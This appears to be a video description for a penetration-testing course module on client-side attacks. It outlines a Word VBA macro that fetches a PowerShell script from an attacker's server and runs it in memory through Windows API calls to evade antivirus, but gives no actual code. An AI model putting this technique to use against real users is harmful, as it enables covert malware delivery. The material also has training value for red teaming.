In-Memory Code Execution With Word Macro

Macros are series of commands and instructions that you group together as a single command to accomplish a task automatically. Office versions prior to Windows 2007 have Macros feature enabled. Macros can even be used in a malicious way and can also help Red Teamers to execute malicious code or accomplish a malicious task and help them gain entry inside an Infrastructure. Since this is coming from a legitimate source "MS Office" it actually seems legit and can raise no alert or suspicion. This video will demonstrate how we can code a VB Macro inside a Word Document which will first substitute a Word page and download a PowerShell Script from the Attacker's Server and execute it straight inside Memory, leaving no footprint behind neither any artifact or residue on the Victims machine. The PowerShell script uses various windows API calls like System.Runtime.InteropServices, VirtualAlloc after importing Kernel32.dll and creates a thread, thus even after the parent process exits the child process or the payload still lives on and works under the radar. This technique bypasses common Antivirus Engines but not all. It can still be detected by various EDRs and AV Vendors. Techniques to make it truly undetectable has been discussed in the later module of the course. This is a video from one of the modules "Client Side Attacks" of our upcoming course on Penetration Testing which will be fully hands on and focus on subjects like Protocol Exploitation, Buffer Overflow, Client Side Attacks, Privilege Escalation (Windows & Linux), Advanced Tunnelling Techniques and much more. Author: https://www.linkedin.com/in/anrbn/

Видео In-Memory Code Execution With Word Macro автора Курсы успеха